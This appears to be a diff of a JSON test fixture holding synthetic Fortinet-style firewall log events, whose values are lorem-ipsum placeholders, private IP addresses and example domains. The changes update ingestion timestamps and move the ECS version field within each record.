severity_level=ptate policy=entsu src=10.44.198.184 src_port=5695 dst=10.189.82.19 dst_port=4267 http_method=odoc http_url=atura http_host=tur http_agent=tur http_session_id=atnonpr 
signature_subclass=ita signature_id=7570 srccountry=colabori content_switch_name=imidestl server_pool_name=piscing false_positive_mitigation=ceroi user_name=iconsequ monitor_status=iat http_refer=https://www.example.net/siuta/atev.htm?CSe=exerci#inesciu http_version=quid dev_id=atcupid threat_weight=onse history_threat_weight=psa threat_level=ate ftp_mode=con ftp_cmd=tqu cipher_suite=eirur msg_id=dese", "event": { - "ingested": "2021-12-09T13:37:31.906954200Z" + "ingested": "2021-12-14T14:43:11.779399246Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=mquisnos date=2017-2-3 time=9:16:50 log_id=lore devid=isci devname=Dui logid=reetdo type=ever subtype=civelits level=high vd=quiav srcip=10.154.34.15 srcport=5986 srcintf=enp0s4064 dstip=10.153.172.249 dstport=7030 dstintf=enp0s3067 poluuid=henderit sessionid=remq proto=21 action=cancel policyid=tla trandisp=arch duration=52.795000 sentbyte=5453 rcvdbyte=3097 devtype=ror osname=onsecte osversion=1.91 mastersrcmac=aecatcup srcmac=01:00:5e:58:7e:f5 crscore=133.560000 craction=quas crlevel=occaeca eventtype=eturadip user=ent service=rumSecti hostname=Utenima260.mail.invalid profile=cept reqtype=aedictas url=https://api.example.org/orio/gna.gif?aaliquaU=olu#iameaque direction=external msg=essequa method=aquio cat=rspicia catdesc=deom device_id=oluptat log_id=roinBCSe pri=medium userfrom=onproide adminprof=uamnih timezone=GMT+02:00 main_type=tatisetq trigger_policy=uidolo sub_type=umdolore severity_level=dmi policy=tam src=10.151.170.207 src_port=1400 dst=10.181.183.104 dst_port=5554 http_method=amni http_url=tatio http_host=amquisno http_agent=modoc http_session_id=magnam signature_subclass=uinesc signature_id=4248 srccountry=idatat content_switch_name=onev server_pool_name=orsi false_positive_mitigation=ntsunt user_name=iosamni monitor_status=idu http_refer=https://example.net/idolo/reet.txt?its=umdolor#isiu http_version=assi 
dev_id=eserun threat_weight=rvelill history_threat_weight=lupta threat_level=byC ftp_mode=imadm ftp_cmd=uta cipher_suite=tisu msg_id=remagnam", "event": { - "ingested": "2021-12-09T13:37:31.906958900Z" + "ingested": "2021-12-14T14:43:11.779399647Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=iumdo date=2017-2-18 time=4:19:24 log_id=iusmodit devid=aturv devname=ectetura logid=obeataev type=umf subtype=olesti level=low vd=quaeabil srcip=10.19.99.129 srcport=956 srcintf=eth62 dstip=10.205.132.218 dstport=1643 dstintf=enp0s5908 poluuid=inim sessionid=etdol proto=17 action=deny policyid=oremeumf trandisp=lesti duration=49.961000 sentbyte=3376 rcvdbyte=6209 devtype=enima osname=tnulapar osversion=1.7278 mastersrcmac=sequ srcmac=01:00:5e:4a:1d:f8 crscore=84.522000 craction=tionula crlevel=accus eventtype=uatu user=mquis service=lab hostname=uido2046.mail.lan profile=tena reqtype=aal url=https://mail.example.org/nimadmin/lumqui.txt?iquip=tinculpa#umtota direction=external msg=rumSecti method=riamea cat=eca catdesc=oluptate device_id=Duisa log_id=consequa pri=low userfrom=iaecon adminprof=aevitaed timezone=PT main_type=rep trigger_policy=remap sub_type=deri severity_level=quaeratv policy=involu src=10.70.7.23 src_port=2758 dst=10.130.240.11 dst_port=6515 http_method=odic http_url=iuta http_host=liquaUte http_agent=scivelit http_session_id=Nequ signature_subclass=quid signature_id=1044 srccountry=lloinve content_switch_name=borisnis server_pool_name=onorumet false_positive_mitigation=ptatema user_name=eavolup monitor_status=ipsumq http_refer=https://www.example.org/tno/iss.gif?ptatev=atu#teturad http_version=eturad dev_id=tDuis threat_weight=mwritten history_threat_weight=tat threat_level=equ ftp_mode=sumdolo ftp_cmd=idolorem cipher_suite=temvele msg_id=oremque", "event": { - "ingested": "2021-12-09T13:37:31.906963800Z" + "ingested": "2021-12-14T14:43:11.779400082Z" + }, + "ecs": 
{ + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=inimve devname=\"uio\" devid=\"mexercit\" vd=byC date=2017-3-4 time=11:21:59 logid=uae type=oremip subtype=its level=very-high eventtime=iavol logtime=natuserr srcip=10.37.161.101 srcport=1552 srcintf=enp0s6659 srcintfrole=evit dstip=10.111.182.212 dstport=4493 dstintf=lo6533 dstintfrole=lamco poluuid=tion sessionid=hender proto=icmp action=deny policyid=seq policytype=rumSe crscore=88.660000 craction=madmi crlevel=tlabore appcat=idunt service=expl srccountry=olore dstcountry=uian trandisp=atuserro tranip=10.17.209.252 tranport=2119 duration=135.770000 sentbyte=313 rcvdbyte=6509 sentpkt=oinBCS app=itsedd", "event": { - "ingested": "2021-12-09T13:37:31.906967700Z" + "ingested": "2021-12-14T14:43:11.779400469Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=ipis devname=\"itautfu\" devid=\"nesci\" vd=tam date=2017-3-18 time=6:24:33 logid=sin type=idexeac subtype=nimadmin level=medium eventtime=edutper logtime=tevelite srcip=10.158.175.98 srcport=1491 srcintf=enp0s7649 srcintfrole=oinBCSed dstip=10.170.196.181 dstport=6994 dstintf=enp0s5873 dstintfrole=obeatae poluuid=iquid sessionid=evo proto=udp action=allow policyid=mqu policytype=pteursi crscore=98.596000 craction=expl crlevel=essecill appcat=totamre service=rpo srccountry=velites dstcountry=nonpro trandisp=nula tranip=10.153.166.133 tranport=4638 duration=39.506000 sentbyte=6610 rcvdbyte=1936 sentpkt=olu app=imide", "event": { - "ingested": "2021-12-09T13:37:31.906971800Z" + "ingested": "2021-12-14T14:43:11.779400853Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-4-2 time=1:27:07 logver=amn devid=itessequ devname=porissu logid=umd type=sumd subtype=sectetur level=low vd=aUtenima srcip=10.62.10.137 
srcport=5596 srcintf=lo6539 dstip=10.138.249.251 dstport=630 dstintf=eth1576 poluuid=deritinv sessionid=evelite proto=6 action=accept policyid=stiaecon trandisp=usBono duration=155.835000 sentbyte=3942 rcvdbyte=5360 devtype=ttenb osname=olor osversion=1.5978 mastersrcmac=lapa srcmac=01:00:5e:b0:3e:44 crscore=105.845000 craction=lors crlevel=oluptat eventtype=enimad user=tis service=qua hostname=con6049.internal.lan profile=quelaud reqtype=luptat url=https://internal.example.com/temse/caecat.jpg?emeu=tatemac#quisn direction=inbound msg=teursint method=etMa cat=llita catdesc=ntsunt device_id=nturmag log_id=uredol pri=high userfrom=temsequi adminprof=mquia timezone=ET main_type=enbyCic trigger_policy=iveli sub_type=conseq severity_level=itame policy=tenat src=10.63.171.91 src_port=4396 dst=10.48.25.200 dst_port=5179 http_method=nse http_url=mveniam http_host=tuser http_agent=mmo http_session_id=eve signature_subclass=nbyCicer signature_id=6129 srccountry=ciad content_switch_name=ugiatqu server_pool_name=eruntmo false_positive_mitigation=nimve user_name=usanti monitor_status=ion http_refer=https://mail.example.org/gelits/iavo.txt?udexerc=ovolupta#volup http_version=macc dev_id=ria threat_weight=beat history_threat_weight=rro threat_level=tuser ftp_mode=ctasu ftp_cmd=irat cipher_suite=sitame msg_id=oinven", "event": { - "ingested": "2021-12-09T13:37:31.906975400Z" + "ingested": "2021-12-14T14:43:11.779401300Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=ute dtime=2017-04-16 08:29:41.792538723 +0000 UTC devid=mexer devname=iam vd=Bonoru date=2017-4-16 time=8:29:41 logid=rcitati type=nula subtype=ameaquei level=low eventtime=adipi logtime=mquis srcip=10.174.17.46 srcport=2743 srcintf=eth6814 srcintfrole=ine dstip=10.77.105.81 dstport=4455 dstintf=enp0s7799 dstintfrole=orem poluuid=giatqu sessionid=rsint proto=udp action=allow policyid=paq policytype=uianon crscore=60.762000 
craction=uisautem crlevel=mquameiu appcat=loremq service=turmagni srccountry=ores dstcountry=ddoe trandisp=uid tranip=10.38.168.190 tranport=7260 duration=129.140000 sentbyte=368 rcvdbyte=7791 sentpkt=incidi app=aedictas", "event": { - "ingested": "2021-12-09T13:37:31.906980Z" + "ingested": "2021-12-14T14:43:11.779401697Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=temaccus devname=\"ons\" devid=\"unt\" vd=liq date=2017-4-30 time=3:32:16 logid=abore type=iumdo subtype=oreeu level=high eventtime=exe logtime=tis srcip=10.36.99.207 srcport=4829 srcintf=lo497 srcintfrole=tvol dstip=10.225.37.73 dstport=5630 dstintf=eth1882 dstintfrole=eniamqu poluuid=iumt sessionid=porissus proto=udp action=cancel policyid=tsunt policytype=rnat crscore=88.508000 craction=ured crlevel=ctetu appcat=oreeu service=uasiarch srccountry=Malor dstcountry=boriosa trandisp=cillumdo tranip=10.166.142.198 tranport=4151 duration=1.040000 sentbyte=465 rcvdbyte=7663 sentpkt=oreetd app=lor", "event": { - "ingested": "2021-12-09T13:37:31.906986200Z" + "ingested": "2021-12-14T14:43:11.779402179Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=etc devname=\"eturadip\" devid=\"nost\" vd=atus date=2017-5-14 time=10:34:50 logid=tassitas type=obea subtype=velite level=medium eventtime=litse logtime=san srcip=10.66.90.225 srcport=4846 srcintf=lo4891 srcintfrole=moenimi dstip=10.214.156.161 dstport=3854 dstintf=eth1188 dstintfrole=ati poluuid=rauto sessionid=doloreeu proto=6 action=block policyid=eumfu policytype=docons crscore=3.408000 craction=eumf crlevel=roquisq appcat=uasi service=maveniam srccountry=uis dstcountry=lill trandisp=remeum tranip=10.145.194.12 tranport=1001 duration=25.398000 sentbyte=6452 rcvdbyte=6820 sentpkt=aturE app=umto", "event": { - "ingested": "2021-12-09T13:37:31.906991500Z" + "ingested": 
"2021-12-14T14:43:11.779402594Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=pariat devname=\"iutal\" devid=\"teturad\" vd=ese date=2017-5-29 time=5:37:24 logid=eddoei type=lorumw subtype=eca level=medium eventtime=nimve logtime=duntut srcip=10.6.242.108 srcport=3373 srcintf=lo3230 srcintfrole=qua dstip=10.156.208.5 dstport=7612 dstintf=lo1800 dstintfrole=quisn poluuid=pteu sessionid=uatD proto=0 action=cancel policyid=antiu policytype=velillum crscore=166.389000 craction=iatquovo crlevel=lapari appcat=Mal service=itinvo srccountry=snulap dstcountry=cidu trandisp=hilmol tranip=10.163.36.101 tranport=253 duration=72.488000 sentbyte=1880 rcvdbyte=4638 sentpkt=ident app=scip", "event": { - "ingested": "2021-12-09T13:37:31.906997600Z" + "ingested": "2021-12-14T14:43:11.779403114Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-6-12 time=12:39:58 devname=uamqu device_id=iusmodi log_id=esciun type=generic subtype=tasnul pri=medium devid=ccusant devname=epteurs logid=rmag type=quisquam subtype=eporroqu level=very-high vd=dit srcip=10.25.134.171 srcport=7867 srcintf=eth4543 dstip=10.43.235.230 dstport=2198 dstintf=lo4581 poluuid=BCSe sessionid=rem proto=0 action=allow policyid=eeufug trandisp=ntin duration=6.686000 sentbyte=5763 rcvdbyte=1048 devtype=cinge osname=tatem osversion=1.4713 mastersrcmac=eritqu srcmac=01:00:5e:ed:6b:57 crscore=10.603000 craction=nimip crlevel=iutaliq eventtype=olore user=onemul service=trudexe hostname=remeum2641.www5.corp profile=Quisa reqtype=quiav url=https://www5.example.com/elit/sam.htm?nevolu=unt#isni direction=outbound msg=ecillum method=olor cat=amei catdesc=doconseq device_id=conseq log_id=emve pri=very-high userfrom=tiu adminprof=wri timezone=GMT-07:00 main_type=asper trigger_policy=dictasun sub_type=psa severity_level=lorese policy=olupta 
src=10.220.148.127 src_port=6681 dst=10.68.233.163 dst_port=3126 http_method=itanimi http_url=onoru http_host=data http_agent=ugits http_session_id=ittenb signature_subclass=tobeatae signature_id=5617 srccountry=quis content_switch_name=exe server_pool_name=naa false_positive_mitigation=equat user_name=estiaec monitor_status=pitlabo http_refer=https://example.net/rcitat/ree.htm?ionofdeF=rsp#imipsa http_version=nostrum dev_id=autodita threat_weight=ntut history_threat_weight=temveleu threat_level=itametco ftp_mode=etcons ftp_cmd=etco cipher_suite=iuntN msg_id=utfugi", "event": { - "ingested": "2021-12-09T13:37:31.907003400Z" + "ingested": "2021-12-14T14:43:11.779403524Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=isnostru date=2017-6-26 time=7:42:33 log_id=nul devid=ntocca devname=trudex logid=tvol type=lup subtype=mipsamv level=medium vd=qua srcip=10.249.194.7 srcport=4987 srcintf=enp0s2282 dstip=10.57.116.17 dstport=90 dstintf=enp0s7442 poluuid=xcep sessionid=gnidol proto=0 action=allow policyid=uaeab trandisp=ptat duration=136.310000 sentbyte=1078 rcvdbyte=6196 devtype=eturadip osname=amquaera osversion=1.4481 mastersrcmac=equ srcmac=01:00:5e:00:fd:79 crscore=18.750000 craction=olesti crlevel=edquia eventtype=ihi user=undeomn service=ape hostname=itaspe3216.localdomain profile=onsecte reqtype=prehende url=https://example.org/porro/issu.htm?inculpa=ruredol#iadeseru direction=unknown msg=numq method=quae cat=periam catdesc=ain device_id=umiurer log_id=mquido pri=very-high userfrom=onorume adminprof=abill timezone=GMT+02:00 main_type=uov trigger_policy=mini sub_type=mve severity_level=tionev policy=uasiarch src=10.116.82.108 src_port=7276 dst=10.94.177.125 dst_port=6683 http_method=nimides http_url=olorsit http_host=naaliq http_agent=plica http_session_id=asiarc signature_subclass=lor signature_id=5152 srccountry=snula content_switch_name=pici server_pool_name=bori 
false_positive_mitigation=dipi user_name=ecatc monitor_status=quovolu http_refer=https://example.net/itse/sse.gif?lupt=quatur#dminim http_version=ptatevel dev_id=aperiame threat_weight=stenat history_threat_weight=uianonnu threat_level=tatiset ftp_mode=quira ftp_cmd=ciatisun cipher_suite=duntutl msg_id=nven", "event": { - "ingested": "2021-12-09T13:37:31.907009100Z" + "ingested": "2021-12-14T14:43:11.779403934Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-7-11 time=2:45:07 devname=saq device_id=asiarch log_id=ssuscipi type=generic subtype=utla pri=medium devid=tquovo devname=fugi logid=nse type=nesciu subtype=todit level=very-high vd=inrepreh srcip=10.14.192.162 srcport=2536 srcintf=enp0s4429 dstip=10.179.128.6 dstport=3375 dstintf=enp0s4580 poluuid=ptate sessionid=volupta proto=3 action=cancel policyid=utla trandisp=emi duration=171.651000 sentbyte=3313 rcvdbyte=7131 devtype=velites osname=oloremi osversion=1.4442 mastersrcmac=apari srcmac=01:00:5e:0c:fb:2b crscore=140.065000 craction=uel crlevel=fficiad eventtype=teirured user=nostru service=rcit hostname=mea6298.api.example profile=eumiu reqtype=tatevel url=https://mail.example.org/uamquaer/texplica.gif?sequa=lorum#suntexpl direction=inbound msg=Sedut method=tatis cat=audant catdesc=obeata device_id=uredol log_id=uptat pri=low userfrom=entorev adminprof=quuntur timezone=GMT+02:00 main_type=exercit trigger_policy=dexer sub_type=idolor severity_level=onpr policy=uira src=10.115.121.243 src_port=550 dst=10.113.152.241 dst_port=2330 http_method=ali http_url=udexerci http_host=uae http_agent=imveni http_session_id=econ signature_subclass=aborio signature_id=1122 srccountry=setquas content_switch_name=nbyCi server_pool_name=runtmoll false_positive_mitigation=busBon user_name=norumetM monitor_status=isno http_refer=https://internal.example.com/ameaq/Quis.html?lestiae=iav#umiure http_version=isiut dev_id=tin 
threat_weight=rporiss history_threat_weight=billoinv threat_level=etconse ftp_mode=nesciu ftp_cmd=mali cipher_suite=roinBCSe msg_id=eetdolor", "event": { - "ingested": "2021-12-09T13:37:31.907014800Z" + "ingested": "2021-12-14T14:43:11.779404393Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-7-25 time=9:47:41 logver=upt devid=equamni devname=atcupi logid=enima type=uptateve subtype=fugitsed level=medium vd=lorem srcip=10.68.159.207 srcport=3320 srcintf=enp0s7206 dstip=10.139.195.188 dstport=893 dstintf=enp0s6960 poluuid=lits sessionid=tvolu proto=17 action=accept policyid=ollitan trandisp=temseq duration=0.684000 sentbyte=3045 rcvdbyte=6863 devtype=edictasu osname=eturadi osversion=1.3804 mastersrcmac=edquiano srcmac=01:00:5e:09:79:f2 crscore=11.231000 craction=taevitae crlevel=tevel eventtype=tatemse user=gitsed service=agn hostname=iqu7510.internal.corp profile=equeporr reqtype=amremap url=https://www5.example.org/aqu/utemvele.gif?serrorsi=tsedquia#rsit direction=unknown msg=ntutlabo method=idex cat=nihilmo catdesc=reetdo device_id=xeaco log_id=taliqu pri=medium userfrom=hite adminprof=umfugi timezone=CT main_type=dminimve trigger_policy=remips sub_type=laboreet severity_level=uptate policy=tot src=10.49.82.45 src_port=435 dst=10.179.153.97 dst_port=1908 http_method=ade http_url=nihilmol http_host=nder http_agent=ano http_session_id=rumexer signature_subclass=eab signature_id=2387 srccountry=saquaeab content_switch_name=eli server_pool_name=rissusci false_positive_mitigation=ectetur user_name=dictasun monitor_status=inimv http_refer=https://api.example.org/volup/untNeq.htm?mremaper=uteirur#ntium http_version=ide dev_id=quunturm threat_weight=quovo history_threat_weight=quaturve threat_level=ntiumdol ftp_mode=conse ftp_cmd=aturve cipher_suite=edqui msg_id=tvolu", "event": { - "ingested": "2021-12-09T13:37:31.907020500Z" + "ingested": "2021-12-14T14:43:11.779404802Z" 
+ }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=ore devname=\"lors\" devid=\"saute\" vd=ecillumd date=2017-8-8 time=4:50:15 logid=iumto type=sequatu subtype=tiumtot level=medium eventtime=mdoloree logtime=que srcip=10.98.52.184 srcport=7402 srcintf=eth3784 srcintfrole=ita dstip=10.99.55.115 dstport=1537 dstintf=eth855 dstintfrole=isnostru poluuid=iad sessionid=ngelits proto=tcp action=accept policyid=billoi policytype=reseo crscore=158.047000 craction=uov crlevel=pariat appcat=icaboNe service=boreetd srccountry=uir dstcountry=rumex trandisp=ectobea tranip=10.205.83.138 tranport=6239 duration=170.113000 sentbyte=3290 rcvdbyte=722 sentpkt=ibus app=lumdol", "event": { - "ingested": "2021-12-09T13:37:31.907026200Z" + "ingested": "2021-12-14T14:43:11.779405334Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=onnu devname=\"reprehe\" devid=\"metMa\" vd=emoen date=2017-8-22 time=11:52:50 logid=ptate type=mipsumqu subtype=turad level=high eventtime=billo logtime=doloremi srcip=10.197.128.162 srcport=2052 srcintf=lo6750 srcintfrole=ionof dstip=10.90.189.248 dstport=1293 dstintf=lo2402 dstintfrole=roi poluuid=reh sessionid=volup proto=prm action=allow policyid=iconsequ policytype=ueporr crscore=127.832000 craction=archite crlevel=tur appcat=ddo service=emp srccountry=inBC dstcountry=did trandisp=atcupi tranip=10.228.11.50 tranport=984 duration=3.401000 sentbyte=6907 rcvdbyte=422 sentpkt=mcol app=tion", "event": { - "ingested": "2021-12-09T13:37:31.907032400Z" + "ingested": "2021-12-14T14:43:11.779406030Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-9-6 time=6:55:24 devname=moll device_id=roinBCS log_id=odit type=event subtype=vol pri=low desc=aloru user=cteturad userfrom=modi msg=cip 
action=deny adom=ntoccae2859.www.test session_id=incididu", "event": { - "ingested": "2021-12-09T13:37:31.907038100Z" + "ingested": "2021-12-14T14:43:11.779406680Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-9-20 time=1:57:58 devname=uinesci device_id=otamr log_id=tsed type=generic subtype=rExc pri=medium devid=saute devname=umdol logid=rerepr type=ipiscin subtype=trudexe level=high vd=ineavol srcip=10.29.34.211 srcport=5638 srcintf=eth1805 dstip=10.161.15.82 dstport=6598 dstintf=enp0s5799 poluuid=aco sessionid=eFini proto=17 action=cancel policyid=mipsa trandisp=uas duration=118.122000 sentbyte=1737 rcvdbyte=6283 devtype=umexe osname=xce osversion=1.7318 mastersrcmac=suntex srcmac=01:00:5e:5b:68:89 crscore=29.865000 craction=rcitati crlevel=siutali eventtype=uiratio user=ficia service=orsit hostname=deFinibu3940.internal.lan profile=rautod reqtype=onorumet url=https://www5.example.com/etcon/chit.txt?erspici=itinvolu#adeserun direction=unknown msg=tinv method=Utenima cat=nse catdesc=umq device_id=enim log_id=oreve pri=low userfrom=snisiu adminprof=atem timezone=ET main_type=vento trigger_policy=litsed sub_type=ciun severity_level=rehender policy=tetura src=10.124.71.88 src_port=7540 dst=10.22.248.52 dst_port=6566 http_method=cons http_url=tinvolu http_host=ptat http_agent=amquisn http_session_id=Finibus signature_subclass=nsequat signature_id=3661 srccountry=scipi content_switch_name=rem server_pool_name=reh false_positive_mitigation=rsitame user_name=tcons monitor_status=squamest http_refer=https://mail.example.com/emveleum/siuta.html?ate=epteur#onproi http_version=usmodit dev_id=orese threat_weight=umdolore history_threat_weight=umqui threat_level=adipisci ftp_mode=eir ftp_cmd=ull cipher_suite=tlabor msg_id=itecto", "event": { - "ingested": "2021-12-09T13:37:31.907043800Z" + "ingested": "2021-12-14T14:43:11.779407234Z" }, - "tags": [ + "ecs": { + "version": 
"1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-10-4 time=9:00:32 logver=ametcons devid=velite devname=ipexeac logid=explicab type=samvolu subtype=teiru level=low vd=orinrep srcip=10.228.213.136 srcport=7247 srcintf=lo1719 dstip=10.185.107.27 dstport=2257 dstintf=enp0s4999 poluuid=iduntutl sessionid=mipsumd proto=udp action=block policyid=quelauda trandisp=rcit duration=166.303000 sentbyte=7229 rcvdbyte=6230 devtype=orese osname=evelite osversion=1.4895 mastersrcmac=oremipsu srcmac=01:00:5e:cd:f6:0e crscore=37.237000 craction=equunt crlevel=mto eventtype=iae user=dent service=Uten hostname=tatiset4191.localdomain profile=aconseq reqtype=mquamei url=https://api.example.org/fug/liquid.txt?ptate=lloi#nseq direction=external msg=isetqua method=ianonn cat=oluptas catdesc=doe device_id=quipex log_id=rchitect pri=very-high userfrom=Bonor adminprof=ipex timezone=PT main_type=upta trigger_policy=ivel sub_type=tmollita severity_level=tionofd policy=iatnula src=10.185.37.176 src_port=1859 dst=10.26.58.20 dst_port=2809 http_method=essequam http_url=undeo http_host=ficiade http_agent=uiinea http_session_id=uianonn signature_subclass=eavolupt signature_id=784 srccountry=elitsedq content_switch_name=liquam server_pool_name=sinto false_positive_mitigation=edi user_name=eumiure monitor_status=ore http_refer=https://internal.example.com/mSe/sis.gif?rchite=rcit#orumwri http_version=tiae dev_id=giat threat_weight=nculpa history_threat_weight=olupt threat_level=tvol ftp_mode=ostru ftp_cmd=mea cipher_suite=tuserror msg_id=agnama", "event": { - "ingested": "2021-12-09T13:37:31.907049800Z" + "ingested": "2021-12-14T14:43:11.779407749Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=deritq dtime=2017-10-19 04:03:07.172538723 +0000 UTC devid=boreetdo devname=teni vd=iin date=2017-10-19 time=4:03:07 logid=nostr type=luptatem 
subtype=tNequepo level=low eventtime=eumfug logtime=sper srcip=10.200.12.126 srcport=2347 srcintf=enp0s7374 srcintfrole=liqu dstip=10.14.145.107 dstport=4362 dstintf=enp0s7861 dstintfrole=aliq poluuid=utem sessionid=oreetd proto=HOPOPT action=block policyid=Nequepo policytype=edictas crscore=55.933000 craction=tur crlevel=borisnis appcat=elitsedd service=hitecto srccountry=loremi dstcountry=nven trandisp=isci tranip=10.250.231.196 tranport=5863 duration=4.105000 sentbyte=2763 rcvdbyte=5047 sentpkt=aquioff app=cip", "event": { - "ingested": "2021-12-09T13:37:31.907055500Z" + "ingested": "2021-12-14T14:43:11.779408183Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=onsequat dtime=2017-11-02 11:05:41.432538723 +0000 UTC devid=tiumd devname=atuse vd=imad date=2017-11-2 time=11:05:41 logid=tura type=equuntur subtype=rve level=high eventtime=mqua logtime=xer srcip=10.225.34.176 srcport=5569 srcintf=lo2867 srcintfrole=amquisn dstip=10.21.203.112 dstport=5930 dstintf=enp0s1294 dstintfrole=sum poluuid=lloinve sessionid=eni proto=HOPOPT action=cancel policyid=edquiac policytype=psamvolu crscore=80.314000 craction=unturma crlevel=iavol appcat=psumdol service=urautodi srccountry=equamni dstcountry=fugia trandisp=uptate tranip=10.103.36.192 tranport=1974 duration=129.001000 sentbyte=2801 rcvdbyte=2565 sentpkt=imidest app=citation", "event": { - "ingested": "2021-12-09T13:37:31.907061900Z" + "ingested": "2021-12-14T14:43:11.779408635Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=nof devname=\"usantiu\" devid=\"periam\" vd=remip date=2017-11-16 time=6:08:15 logid=dexea type=aturExc subtype=antiumto level=low eventtime=obe logtime=niamqu srcip=10.140.59.161 srcport=3599 srcintf=eth575 srcintfrole=tev dstip=10.5.67.140 dstport=5687 dstintf=enp0s6143 dstintfrole=intoc poluuid=obeataev 
sessionid=rrorsit proto=udp action=accept policyid=umquid policytype=olabo crscore=79.046000 craction=dolor crlevel=rsp appcat=quir service=giatqu srccountry=olors dstcountry=roid trandisp=lorum tranip=10.118.111.183 tranport=5410 duration=96.462000 sentbyte=6821 rcvdbyte=6222 sentpkt=mipsu app=nvol", "event": { - "ingested": "2021-12-09T13:37:31.907068800Z" + "ingested": "2021-12-14T14:43:11.779409079Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-12-1 time=1:10:49 logver=llu devid=quaUt devname=labor logid=oris type=tatemse subtype=uta level=very-high vd=tse srcip=10.170.104.148 srcport=5722 srcintf=lo259 dstip=10.60.92.40 dstport=5836 dstintf=enp0s4446 poluuid=dicons sessionid=BCSedutp proto=udp action=accept policyid=ritatise trandisp=nihilm duration=104.607000 sentbyte=6659 rcvdbyte=5351 devtype=isauteir osname=eritquii osversion=1.4493 mastersrcmac=uisno srcmac=01:00:5e:e9:ec:d5 crscore=34.736000 craction=itaed crlevel=invol eventtype=Loremips user=cidun service=tassitas hostname=nimadmi4084.api.home profile=eufugia reqtype=nor url=https://example.net/aturQui/tquii.html?uiac=squ#litess direction=unknown msg=involupt method=itempo cat=upt catdesc=rve device_id=amq log_id=abillo pri=high userfrom=ationem adminprof=Nem timezone=OMST main_type=ollita trigger_policy=dipisci sub_type=amnisiu severity_level=ptat policy=epr src=10.7.70.169 src_port=2514 dst=10.28.212.191 dst_port=1997 http_method=nostru http_url=Loremip http_host=veleumiu http_agent=rcita http_session_id=turad signature_subclass=sequamni signature_id=4799 srccountry=ollita content_switch_name=ectetu server_pool_name=radi false_positive_mitigation=ula user_name=itsed monitor_status=rad http_refer=https://internal.example.com/ididu/autodit.gif?seru=oriss#imadmin http_version=suntexpl dev_id=urve threat_weight=sBonoru history_threat_weight=everi threat_level=squ ftp_mode=emagnaal ftp_cmd=nih 
cipher_suite=ncididu msg_id=itati", "event": { - "ingested": "2021-12-09T13:37:31.907072900Z" + "ingested": "2021-12-14T14:43:11.779409621Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-12-15 time=8:13:24 logver=estla devid=ione devname=ecillum logid=maccu type=ame subtype=pitlabo level=very-high vd=urExc srcip=10.37.124.214 srcport=6919 srcintf=lo7727 dstip=10.37.111.228 dstport=7082 dstintf=enp0s20 poluuid=dmini sessionid=tquid proto=17 action=block policyid=iatisun trandisp=cto duration=144.899000 sentbyte=2372 rcvdbyte=7417 devtype=imadmini osname=iatisund osversion=1.6506 mastersrcmac=aUtenim srcmac=01:00:5e:28:0c:11 crscore=172.422000 craction=etdol crlevel=sed eventtype=uep user=ametco service=nde hostname=reprehe3525.www5.example profile=mquisno reqtype=eaco url=https://mail.example.org/mvele/teveli.htm?Nequepor=luptate#aturvel direction=internal msg=dexea method=sedquia cat=litesse catdesc=ntmo device_id=aliqu log_id=iqu pri=very-high userfrom=ationula adminprof=doconse timezone=CEST main_type=oreeufug trigger_policy=ptatems sub_type=tenima severity_level=emagnam policy=iaco src=10.148.197.60 src_port=5711 dst=10.143.144.52 dst_port=974 http_method=nvo http_url=lab http_host=sedqui http_agent=iuntNe http_session_id=tdolor signature_subclass=Ute signature_id=2191 